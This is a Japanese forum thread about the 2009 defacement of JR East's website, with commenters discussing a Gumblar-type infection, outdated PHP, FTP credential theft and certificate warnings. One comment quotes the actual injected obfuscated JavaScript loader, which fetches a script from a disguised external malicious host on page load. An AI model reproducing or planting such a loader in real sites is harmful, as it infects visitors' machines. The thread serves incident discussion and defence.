JR東日本サイトが改ざんされた模様 42
ストーリー by hayakawa
14時現在もこの表示ですね 部門より
14時現在もこの表示ですね 部門より
あるAnonymous Coward 曰く、
先程(午前6時頃)JR東日本のWebサイトにアクセスしたところ、このページに転送され、以下の文章が記載されている。どうやら不正アクセス行為があったようだ。
当サイトの一時停止について
2009年12月23日
当社のホームページサイトの一部が、不正アクセスにより改ざんされていることが判明したため、現在、通常のページを一時停止いたしましたのでお知らせ致します。
現在、原因について調査しており、安全が確認され次第、再開の予定です。
なお、以下のサービスについてはご利用いただけます。
ご利用のお客さまにはご迷惑をお掛けし、誠に申し訳ございません。深くお詫び申し上げます。
東日本旅客鉄道株式会社なお、利用可能なサービスは、リンク先を参照されたい。
安全が確認され次第、再開の予定です。 (スコア:5, おもしろおかしい)
停止信号のアナウンスかと思った。
Re: (スコア:0)
年に2万体逝っているのか!? と一瞬思ったが
1件で複数本に影響が出るわけで勘定が多くなるんだな
リンク先見て得心
Re: (スコア:0)
自殺者が十年以上続けて年間3万人超で、首都圏が1/3としても1万人超。
多く見積もっても2万はいかないと思うし、その全てが電車というはずはないですから、
首都圏の電車への飛び込み自殺が年間2万人ということはないでしょう。
あと自殺未遂でも小規模な影響はでますしね。
#自殺未遂で半死半生が一番時間がかかりそう。
しかし、他も含め全国で年間3万人の自殺が多いと見るか少ないと見るか……。
検索は別のドメインで行っていた模様 (スコア:5, 興味深い)
事だけはわかるけど。Zone-H.org にも情報は無いし。
過去のページが見れるサイトでJR東のサイトの去年のソースを見ると、<form action="http://webseek1.cab.infoweb.ne.jp/cgi-bin/common.cgi" method="post" target="_top"> とかやっているっぽい。「ん? これは検索は別ドメインで、という事かな」と思ったけど、こういう構造だと本質的にクロスドメインでやられ易いような。オレはWebやセキュリティーは詳しくないので判らんが。
仮に「検索は webseek1.cab.infoweb.ne.jp で実行していた」のであれば、これ自体は netcraft 情報では InfoWebFujitsu Ltd の Solaris 8 / Apache のようだ。OS/Server の Last changed が 7-Jun-2006 って、大丈夫なのか? バージョンを見ようと思ったが、現在 webseek1.cab.infoweb.ne.jp は動いていない模様。
Re:検索は別のドメインで行っていた模様 (スコア:3, 参考になる)
との事。 telnet の 80 で http://www.jreast-search.jp/result/search.php [jreast-search.jp] のヘッダを見ると…
かぁ。PHP 5.2.4 って、リ2007年9月3日にリース [php.gr.jp]されたバージョンね。5.2系だと最新はPHP 5.2.12 [php.net] だから、8 つ前のバージョンかぁ。だいたい PHP って脆弱性の常連…Finding vulnerabilities in PHP scripts FULL ( with examples ) [milw0rm.com]とか出てるし、古くは 5.2.6 では PHP path translation vulnerability [cert.org]、5.2.7 もPHP におけるクロスサイトスクリプティングの脆弱性 [jvn.jp]が出てるし。5.2.4 だけど、パッチはバックポートしてるのか? そうでなけりゃ、実質「ノーガード戦法」なのですぐまたヤラれそうな予感。
Re: (スコア:0)
こりゃ [ascii.jp]、バージョンを上げても別の攻撃手段を使って書き換えられそうですね。
最新版にゼロデイ攻撃の手段がないことの証明は、悪魔の証明ですよねぇ。
Re: (スコア:0)
検索のほうは随分長い間放置されてたんですね。使ってる人がいなかったのか。CGIだからグーグルとかも危険サイトの検出できなかったのかな。
JR裏日本 (スコア:5, おもしろおかしい)
ふと、「JR裏日本」てなフレーズが頭をよぎった。
# 裏日本って表現が消えたのっていつ頃だっけか?
Re:JR裏日本 (スコア:2, 興味深い)
「裏稼業」「裏通り」のような言葉だと、反対側であるというよりは主に対する副のようなニュアンスでしたが、
「裏本」「裏ビデオ」のように背徳的なニュアンスが強調されるようになってから、修飾語として裏を使うのは自重されるようになっていったようです。
昭和の終わり頃にはすでに公の場で裏日本と呼ぶことは稀だったと思います。マスメディアの自粛用語集にも載っていたはず。
さらに時代が進んで「裏ワザ」「裏商売」ともなるとナイーブな人の購買意欲を煽るただの強調表現に堕してしまい、やはりよいイメージではありません。
Re: (スコア:0)
1960-1970年代に出雲空港や小松空港の民間定期便が定着して
からは使う頻度が減ったんじゃないですかねえ。
空路には山関係ないし。
もう許してやれよ・・・ (スコア:3, 興味深い)
ついにトップページから羽越線脱線事故の謝罪文がなくなった!
復旧したらまた戻るんだろうけど。
ナショナルもパロマもだが、そろそろいいだろ・・・
Re:もう許してやれよ・・・ (スコア:2)
JR西日本もね。
引っ込めようという話も多分にあったんだろうけど、方方から色々言われたんだろうなぁと邪推。
(でも、クッキー使って、チェックボックスに、この文章を表示しない…っていう
挙動もできそうだが、そういった設計も「反省がたらん!」とか言われそうだもんなぁ。)
Re:もう許してやれよ・・・ (スコア:1, 参考になる)
私もそう思っていましたが、先日担当者三名が書類送検されたとのことで
もういいとかそれ以前に、まだ解決していないというのが実状なんでは。
Re: (スコア:0)
被害者や遺族が、そう思えるようになったら、それでいいんじゃない?
Re:もう許してやれよ・・・ (スコア:1, すばらしい洞察)
トップページに表示されてたら鬱陶しいと思うのは当然でしょう。
被害者や遺族を気にかけるのもいいけど、何事もやりすぎは良くない。
Re: (スコア:0)
被害者や遺族用の特設ページを作ったら良いんだ。
それこそ、SNSとかで。
独自ドメインでも取ってさ。
Re: (スコア:0)
Gumblar亜種という発表はウソ。実際は JSRedir-AK (スコア:3, 参考になる)
これじゃJR東の発表は、全く信用できないな。実際に埋め込まれていたコードはこれ。
<script>/*GNU GPL*/ try{window.onload = function(){var Hva23p3hnyirlpv7 = document.create +Element('script');Hva23p3hnyirlpv7.setAttribute('type', 'text/javascript');Hva23p3hnyirl +pv7.setAttribute('id', 'myscript1');Hva23p3hnyirlpv7.setAttribute('src', 'h))t#^t$#))!p +&&#:^!&/^^/)^(@m&()y&#b(r@&&!!o)^w(&(s)^)$e(@&#r&))b^a#r!&$-#@c&#o#m#@&.)@$s)a!m$&s#)^u! +$^n$g#!.$c!^o^@(m#.^n@!#a@@s#$!a#&-(@^g$o)#v)@&$.(!(@(e)&g&!#r)e)@)a^)t$!s(!(a@!l#e@.@)@ +r)#u(&#!:)@8!^)0!8$!(0!/^#m$$e)g^&a###v&!i&d!e))#o!@(.(@c&)o$!(m^&/^m&^e((^)g$!((a)#)^v@ +!i(@&#d#)e@&o$#.^c$!#o@m^/$#&l$a)r#@(e)^^d#&o(!()u#(t$)e##.$f(r^&(@/!(^&b!!i)$$l@)!)d^&. +#@&(d$@$e(/)g$o^o$&^g^!&l()e!).(@^#c)$!o#&)@@m!/^$'.replace(/\$|\^|\!|&|\)|\(|@|#/ig, '' +));Hva23p3hnyirlpv7.setAttribute('defer', 'defer');document.body.appendChild(Hva23p3hnyi +rlpv7);}} catch(e) {}</script></div>
Re: (スコア:0)
Re: (スコア:0)
マルウェアは色々なマルウェアを組み合わせたり仲間を呼ぶので、何処を本体と呼ぶべきかは微妙だけど。
この部分自体は置換による広告回避への対策としてよく使われるコードと全く同種の、単なる外部スクリプトローダ。
外部スクリプトはアクセス毎に異なるスクリプトを返すこともあるので、実際にこれによって感染するのがGumblarであるか別の物であるかは分からないし、このスクリプトを埋め込んだ主体がGumblarであるか別の物であるかは分からない。
でも、この手口がGumblarのモノと同じであるのは確かだよ。
年末年始の空席状況が余裕だと思ったら (スコア:1)
12月半ばに「年末年始の空席状況」で1月3日の上り新幹線に空席があるなどおかしいな、とは思っていたんです。実際には当然完売でしたけど。
# え、そこちがう?
すごい負荷がかかっているだろう時期にレスポンスよく空席照会できるシステムを運用しているだけでも大変だろうに、こんなことまで降って湧いてはたまらないでしょうね。鉄道屋に正月がないのは伝統とはいえ。
Jubilee
Windows の IISの問題? (スコア:1, オフトピック)
IIS の脆弱性ですか?
Gumblar亜種でした (スコア:3, 参考になる)
ということですので、IISの脆弱性ではないようです。
Re:Gumblar亜種でした (スコア:1)
4. 感染しているかの確認、駆除する方法(無料)
トレンドマイクロ社 オンラインスキャン
http://www.trendflexsecurity.jp/housecall/index.html?WT.ac=JPclusty_on... [trendflexsecurity.jp]
※「オンラインスキャンを今すぐ開始する」をクリック
このトレンドマイクロのオンラインスキャナ、署名の有効期限が2007年2月で切れている様子です……
JRの担当者、チェックしていないんでしょうか?
# 身内への電話対応で、署名自体は有効だから大丈夫と説明するのが面倒でした。
notice : I ignore an anonymous contribution.
期限切れでも署名は有効 (スコア:2, 参考になる)
コードサイニング証明書はタイムスタンプ設定というのがあって、
証明書の有効期限が過ぎていても、デジタル署名は有効です。
http://jp.globalsign.com/support/index.php?action=artikel&cat=13&a... [globalsign.com]
※VeriSignもそうなんだけど、見つけられなかった。
Re: (スコア:0)
タイムスタンプが有効なら、OSやブラウザやJREが警告を出すことはなく、したがって証明書を無視するように教え込む必要もありません。逆に言うなら、警告が出ているということはタイムスタンプが有効というケースだではないはずです。
# 上述の通りWin7だと弾かれて確認できない。
# つーか何でブラウザの機械的検証ごときに人間様が負けてたまるかという自信過剰な人がこんなに多いの?
Re: (スコア:0, すばらしい洞察)
Windows 7だと2000/XP/Vistaのみ対応とか言って弾かれた…
> # 身内への電話対応で、署名自体は有効だから大丈夫と説明するのが面倒でした。
大丈夫じゃねーよ。百歩譲ってあんた自身が自己責任でオレオレ証明書を踏むのは勝手だとしても他人を踏むように教育するな。
それにしても「怪しいサイトへのリンクは踏むな」なんて寝言いつまで言い続けるつもりなんだろうね。もはや「従業員がWinnyを使ったことのある企業の製品は利用しない」並みに不可能だと思うんだが。
Re:Gumblar亜種でした (スコア:2)
> 大丈夫じゃねーよ。百歩譲ってあんた自身が自己責任でオレオレ証明書を踏むのは勝手だとしても他人を踏むように教育するな。
そもそも、一般人に証明書の正当性を判断させることが間違っています。
警告しても、それを理解できない者、あえて無視する者は、どんな教育をしていても出てきます。
実際にあなたも、自己責任とは言いつつ、大丈夫であろうと思いオレオレ証明書のページを開いてますよね?
これは、利用者に対しての教育云々の話ではなくて、
ブラウザがそもそも、知らない証明書を警告扱いにしているのが間違いで、
それが人間の判断に任せてページを開くことが出来るブラウザがセキュリティーホールです。
人間は間違いもしますし、欲求のためなら多少のムリもしてしまう生き物です。
Re:Gumblar亜種でした (スコア:2, すばらしい洞察)
逆ではないでしょうか。
一般的なブラウザであれば問題ないと判断する証明書ではないのなら、それが大丈夫なのかどうか判断できない人には「危険なものだ」と認識してもらうべきです。
ブラウザが知らない証明書を警告扱いしているのは、いわゆる「オレオレ証明書」では何の証明にもならないからであって、それ自体は間違いではありません。また、ブラウザが知らなくとも人間の側で確認を行えるユーザーのために「人間の判断に任せて」動作することもできます。これらは何らセキュリティーホールではありません。
そもそもセキュリティの基本を考えれば「安全な方に倒す」べきであるので、警告が出てそれが何だか判らないユーザーからの問い合わせに「それはOKでいい」とだけ回答するのはセキュリティという観点で見れば間違いでしかありませんし、それをブラウザだけで解決できないから、と開き直っても何もいいことはありません。
Re:Gumblar亜種でした (スコア:2)
言葉足らずですいません。
現在のブラウザは、証明書がいい加減な場合は、かなり警告を出していますが、
結局の所、人間の判断によってブラウザはページを表示することをを許してしまいます。
証明書がいい加減な場合は、そもそも人間に警告して質問するのではなく、
ブラウザが問答無用でエラーとして扱いページを表示させるなということです。
そうすれば、人間は判断する必要はないことから、
人間を教育する必要も無いですし、判断を誤り間違いを起こすこともありません。
一般ユーザの方に、警告を出してまでページを表示する手段を提供する必要はありません。
Re: (スコア:0)
Re: (スコア:0)
Re: (スコア:0)
お年寄りが電話口の相手を親族や役所だと思い込むのを防ぐのは電話会社や銀行の対策では不可能だからオレオレ詐欺の対策など必要ないし、ましてや注意喚起など無駄以外の何者でもないということですね。たいへんよくわかりました。自分で判断できない人間に判断させるのがそもそもの間違いですから、どんどん成年被後見人にでも登録すべきですね。
Re: (スコア:0)
> 警告しても、それを理解できない者、あえて無視する者は、どんな教育をしていても出てきます。
> 実際にあなたも、自己責任とは言いつつ、大丈夫であろうと思いオレオレ証明書のページを開いてますよね?
それでも警告はすべきでは? 自分はそうしています。
私は、アンチウイルス等のツールによる監視が有効になっている事を確認の上で、
恐らくは直接的な問題は無かろう、と言う憶測の上で警告の出るページを開いていますが、
そのサイトの運営者がセキュリティ意識が薄い事は間違いないので、
いつの間に偽サイト
Re:Gumblar亜種でした (スコア:1)
(詳細は問題のリンクより実物を御確認願います。)
notice : I ignore an anonymous contribution.
Re:Windows の IISの問題? (スコア:1, 興味深い)
IISのFTPサーバはSSL経由のFTPはサポートされてないから脆弱だと思うのだけれど。
SCPとかの代替手段も提供されてないし。
いちおうHTTPSのWebDAVが推奨されているが。
IIS の FTP (File Transfer Protocol) サービスに関する情報
http://support.microsoft.com/?id=283679 [microsoft.com]
>IIS の FTP サービスでは、SSL (Secure Sockets Layer) 経由の FTP はサポートされていません。
それでID/PASSをGumblarに収集されて不正アクセスにより改ざんされたってことですよね。
IISじゃなくてもセキュアなプロトコルでやってなかったという。
改ざんの原因は運用の脆弱性でしょう。
Re:Windows の IISの問題? (スコア:1)
にしても、FTP がワイドオープン、というのはにわかに信じがたいんだが...。
ISP がユーザ向けに用意する、「あなたのホームページを持ちませんか」用のサイトとか、安価なホスティングサービス用だったら、IP でフィルタリングせずに、どこからでも認証が通れば書き換え可能、というのは分かるけど、今回の JR 東日本のサイトで、FTP をワイドオープンにしておく必要性が感じられない。
これまで、Gumblar と言えば、FTP のアカウント、パスワードを取得して、それによってサイトの改ざんが、という流れだったけど、今回、JR 東日本がやられたという Gumblar の亜種も同様だったのかどうか、気になるところ。
もし、本当に JR 東日本ののサイトが FTP ワードオープンだったら、「そりゃ、ダメだ」と思うが...
Re: (スコア:0)
まぁ、普通に考えれば、色々な小道具を使った複雑な攻撃でしょう、セキュリティのプロ中のプロぐらいしか思いつかないような…。
Re: (スコア:0)
構築はhp主体だった筈ですが・・・今は違うのかな?
NHKのBSニュースで (スコア:0)
と伝えてて「人に感染するコンピューターウイルスか!」とオモタ。
Re: (スコア:0)
それにイバラの道を歩けないブラウザ使ってる時点でもうアウト。